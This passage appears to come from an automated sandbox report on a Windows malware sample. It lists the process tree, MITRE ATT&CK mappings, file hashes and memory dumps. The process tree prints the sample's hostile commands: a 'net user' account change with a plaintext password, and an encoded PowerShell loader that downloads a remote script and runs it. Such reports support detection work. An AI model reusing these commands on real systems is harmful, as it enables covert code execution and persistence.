- Suspicious use of WriteProcessMemory
PID:3828
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc vxsBvxdC
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc vxsBvxdC
    3⤵
    PID:4028

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:736

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2672
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:3852

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1444
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:3848

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES676F.tmp

MD5
a03474ae3c01ee08fe33a05ce7b86fd1

SHA1
24004eae25800d7c044fd6e1e3cbb55ebe7585bc

SHA256
fe1f1a7e3203487196dc674580bbcc15d58f59f4f703526e7bdcd11e122a614e

SHA512
1c66f591c73742e5de8f27242c6b168c5e5152ab0ea583237920436fdda1a8503adee6cbb1c193e8ef0e46d071ea99512826ac7bb653b246b3d42856edd11f71

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5
09943fef6e44c022be35da249d514723

SHA1
bbb0cb31ab3cc5cdf80cea91dc15a6fdf127a0f9

SHA256
d3fb75a7ea8a822d7ce99ae06caaf1182860ddc321142494e45d7a071193e953

SHA512
1b4ee7254f56f39b605f10c2573054f4b7256ebd512a5943acb41c23558380443cd594d11e3ba7583a7f45d401d1b684f8c94febe3567ab903724f04e01dff9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\keemdhfy\keemdhfy.dll

MD5
5ce67a7cf6b0c680ecb36e5ecdc2bea7

SHA1
2ba7ee7f9398303628f3caf15183f20b788c4655

SHA256
498b4776836eda642539fdc76e045c5412ae470e59f4e743e4a93f3d34534d53

SHA512
1fe2a38175a86bc0283ce39c7f901747215666cd45c295d049147b930fea7adb05a0e210a18afd79c3ecdbf13f96b9f985f96c5ea46484faa5ff6710ab70db44

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\keemdhfy\CSCBC17C2276B694E33B56DC9BD8A65BFB8.TMP

MD5
7584bd01b18e1311aab0ca5e1cac86a3

SHA1
06b3e22bb8366883bd343ba87e4430918e1068df

SHA256
efb175fd8e0952106a0f6992cc43e87075edb2059b952ef16a2a011f214b7733

SHA512
54f6141b7300f74546f5af856478f99e5dfeafa3c9dd5fbb620cd6a90756c02e2eab8c5e16df359ca761697b07b7759a992d6cc04ea22b99a048feab095c8868

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\keemdhfy\keemdhfy.0.cs

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\keemdhfy\keemdhfy.cmdline

MD5
7cee20e29a11c39a0c64ea7552b49b6a

SHA1
445d4b0a000c755485bc0878d347b564e4217622

SHA256
d19f7044ef492076047f3b7be504ab9f678825f6888d57771d17a9b80f7b3f29

SHA512
b2b707c2dc87ece19f5e6772be876c55e2ad6ada9a8e9752c5349a8b5252effeffd1fd900a06434e3a50007e1b95300ea9a5f2aa3be3cddd3a1d78525e806c24

Download Submit
\Windows\Branding\mediasrv.png

MD5
b98428c062b0eab6e519248af60ba869

SHA1
429e8a43e6bdcec95e381e63ebacf32b461ffa0c

SHA256
119ca0528bef4b1ee7e16683ed3a0705648fea93379903f254ef4ef735db8193

SHA512
43098defabf2ea8d052de9a69a2a1f92ec4b4cf73c89447c8f5dac85190d7489498cc6f8b32865fb322ae1f2ab05c3f8e51905fd97b446e9e81bfbf1b089c43a

Download Submit
\Windows\Branding\mediasvc.png

MD5
d9cbd823509feefe440aa85a009a5a7c

SHA1
430faab3ded95b6b494acee0739937acac80d8ce

SHA256
b94301a42868f776f5b05abdbd76fc5f13e9cf4576eb48328adddb08e8b2872a

SHA512
40ef5d5e6a4969478ca295a39659b16d618b7fd049d29780b9d05393e266a60d0725641004d896118c1af20b7f2a58ee3bb696c6b672a536acb071b4a09228ae

Download Submit
memory/364-114-0x0000017DFF820000-0x0000017DFFC1F000-memory.dmp

Filesize
4.0MB

Download
memory/364-117-0x0000017DFF413000-0x0000017DFF415000-memory.dmp

Filesize
8KB

Download
memory/364-119-0x0000017DFF416000-0x0000017DFF417000-memory.dmp

Filesize
4KB

Download
memory/364-118-0x0000017DFF415000-0x0000017DFF416000-memory.dmp

Filesize
4KB

Download
memory/364-116-0x0000017DFF410000-0x0000017DFF412000-memory.dmp

Filesize
8KB

Download
memory/564-235-0x000001A406FF3000-0x000001A406FF5000-memory.dmp

Filesize
8KB

Download
memory/564-202-0x0000000000000000-mapping.dmp

Download
memory/564-236-0x000001A406FF6000-0x000001A406FF8000-memory.dmp

Filesize
8KB

Download
memory/564-272-0x000001A406FF8000-0x000001A406FFA000-memory.dmp

Filesize
8KB

Download
memory/564-351-0x0000000000000000-mapping.dmp

Download
memory/564-234-0x000001A406FF0000-0x000001A406FF2000-memory.dmp

Filesize
8KB

Download
memory/736-362-0x0000000000000000-mapping.dmp

Download
memory/808-350-0x0000000000000000-mapping.dmp

Download
memory/1424-135-0x0000025F6D713000-0x0000025F6D715000-memory.dmp

Filesize
8KB

Download
memory/1424-153-0x0000025F6E3A0000-0x0000025F6E3A1000-memory.dmp

Filesize
4KB

Download
memory/1424-152-0x0000025F6E010000-0x0000025F6E011000-memory.dmp

Filesize
4KB

Download
memory/1424-125-0x0000025F55570000-0x0000025F55571000-memory.dmp

Filesize
4KB

Download
memory/1424-146-0x0000025F6D718000-0x0000025F6D719000-memory.dmp

Filesize
4KB

Download
memory/1424-128-0x0000025F6D8A0000-0x0000025F6D8A1000-memory.dmp

Filesize
4KB

Download
memory/1424-144-0x0000025F555F0000-0x0000025F555F1000-memory.dmp

Filesize
4KB

Download
memory/1424-134-0x0000025F6D710000-0x0000025F6D712000-memory.dmp

Filesize
8KB

Download
memory/1424-120-0x0000000000000000-mapping.dmp

Download
memory/1424-136-0x0000025F6D716000-0x0000025F6D718000-memory.dmp

Filesize
8KB

Download
memory/1648-444-0x0000000000000000-mapping.dmp

Download
memory/2340-352-0x0000000000000000-mapping.dmp

Download
memory/2412-297-0x0000000000000000-mapping.dmp

Download
memory/2468-137-0x0000000000000000-mapping.dmp

Download
memory/2676-140-0x0000000000000000-mapping.dmp

Download
memory/2676-299-0x0000000000000000-mapping.dmp

Download
memory/2764-298-0x0000000000000000-mapping.dmp

Download
memory/2792-353-0x0000000000000000-mapping.dmp

Download
memory/2872-346-0x0000000000000000-mapping.dmp

Download
memory/2884-359-0x0000000000000000-mapping.dmp

Download
memory/3096-364-0x0000000000000000-mapping.dmp

Download
memory/3188-445-0x0000000000000000-mapping.dmp

Download
memory/3516-354-0x0000000000000000-mapping.dmp

Download
memory/3676-341-0x0000000000000000-mapping.dmp

Download
memory/3756-342-0x0000000000000000-mapping.dmp

Download
memory/3768-360-0x0000000000000000-mapping.dmp

Download
memory/3840-355-0x0000000000000000-mapping.dmp

Download
memory/3848-380-0x00000168EADE6000-0x00000168EADE8000-memory.dmp

Filesize
8KB

Download
memory/3848-365-0x0000000000000000-mapping.dmp

Download
memory/3848-394-0x00000168EADE8000-0x00000168EADE9000-memory.dmp

Filesize
4KB

Download
memory/3848-376-0x00000168EADE0000-0x00000168EADE2000-memory.dmp

Filesize
8KB

Download
memory/3848-377-0x00000168EADE3000-0x00000168EADE5000-memory.dmp

Filesize
8KB

Download
memory/3852-363-0x0000000000000000-mapping.dmp

Download
memory/3884-337-0x0000000000000000-mapping.dmp

Download
memory/3952-343-0x0000000000000000-mapping.dmp

Download
memory/3960-356-0x0000000000000000-mapping.dmp

Download
memory/3972-241-0x0000000000000000-mapping.dmp

Download
memory/3972-274-0x0000020153A23000-0x0000020153A25000-memory.dmp

Filesize
8KB

Download
memory/3972-273-0x0000020153A20000-0x0000020153A22000-memory.dmp

Filesize
8KB

Download
memory/3972-275-0x0000020153A26000-0x0000020153A28000-memory.dmp

Filesize
8KB

Download
memory/3980-358-0x0000000000000000-mapping.dmp

Download
memory/3980-336-0x0000000000000000-mapping.dmp

Download
memory/3984-345-0x0000000000000000-mapping.dmp

Download
memory/4004-357-0x0000000000000000-mapping.dmp

Download
memory/4008-203-0x0000025F7DED8000-0x0000025F7DEDA000-memory.dmp

Filesize
8KB

Download
memory/4008-173-0x0000025F7DED6000-0x0000025F7DED8000-memory.dmp

Filesize
8KB

Download
memory/4008-170-0x0000025F7DED3000-0x0000025F7DED5000-memory.dmp

Filesize
8KB

Download
memory/4008-169-0x0000025F7DED0000-0x0000025F7DED2000-memory.dmp

Filesize
8KB

Download
memory/4008-160-0x0000000000000000-mapping.dmp

Download
memory/4012-344-0x0000000000000000-mapping.dmp

Download
memory/4028-361-0x0000000000000000-mapping.dmp

Download
memory/4076-347-0x0000000000000000-mapping.dmp

Download
memory/4088-340-0x0000000000000000-mapping.dmp

Download